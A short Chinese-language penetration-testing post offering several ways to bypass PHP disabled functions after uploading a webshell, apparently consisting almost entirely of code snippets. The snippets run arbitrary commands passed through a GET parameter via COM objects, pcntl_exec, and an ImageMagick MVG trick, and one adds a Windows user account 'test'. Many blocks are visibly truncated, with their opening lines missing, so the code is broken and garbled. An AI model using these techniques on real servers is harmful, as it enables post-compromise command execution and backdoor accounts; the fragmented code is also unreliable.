在渗透测试过程中可能经常会遇到上传webshell后,由于php.ini配置禁用了一些如exec(),shell_exec(),system()等执行系统命令的函数,导致无法执行系统命令,就此问题给出几种绕过方法。
话不多说,直接贴代码:
···math
exec("cmd.exe /c ".$_GET['c']."");
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>
/tmp/output.txt\n";
file_put_contents($cmd, $c);
chmod($cmd, 0777);
$cd="/tmp/output.txt";
print_r(file_get_contents($cd));
switch (pcntl_fork()) {
case 0:
$ret = pcntl_exec($cmd);
exit("case 0");
default:
echo "case 1";
break;
}
···
···
ShellExecute("net"," user test test /add");
//$exec=$phpwsh->ShellExecute("cmd","/c net user test test /add");
?>
···
···
open("c:\\windows\\system32\\cmd.exe");
?>
···
···
NameSpace("C:\Windows\System32")->Items()->item("cmd.exe")->invokeverb();
?>
···
···
NameSpace("C:\Windows\System32")->Items()->item("cmd.exe")->invokeverbEx();
?>
···
···
exec('cmd.exe /c '.$command); //调用对象方法来执行命令
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput
?>
···
···
1.txt");
?>
···
···
readImage('KKKK.mvg');
$thumb->writeImage('KKKK.png');
$thumb->clear();
$thumb->destroy();
unlink("KKKK.mvg");
unlink("KKKK.png");
?>
···
···
readImageBlob($e);
?>
···